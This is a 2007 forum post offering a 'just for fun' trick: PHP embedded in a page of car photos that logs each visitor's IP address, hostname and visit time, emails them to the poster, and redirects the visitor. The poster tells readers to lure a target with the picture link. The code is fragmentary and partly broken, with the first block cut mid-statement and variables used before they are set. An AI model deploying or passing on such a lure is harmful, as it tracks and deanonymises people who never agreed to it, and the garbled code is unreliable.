View Single Post
  #5 (permalink)  
Old 05-16-2007, 03:29 PM
kaitandev kaitandev is offline
Member
 
Join Date: Sep 2006
Posts: 36
Default just for fun

if you really want to waste some time:
take somewhere some free space,upload a few pics with your car,embed this:
Quote:
$host</body></html>";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}
?>
******************************
<?php
$fl = fopen('iplog.txt', 'a');
fwrite($fl, "$ip . $host . $date \n\n");
fclose($fl);
$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
?>
<script type="javascript">
window.location="<anywhere you want>";
</script>


create iplog.txt,chmode it 777,send him the link to see the pics,his ip will be emailed to you(change your@email.com with your adress)
maybe useless,those guys use aol,cs and stuff...
Reply With Quote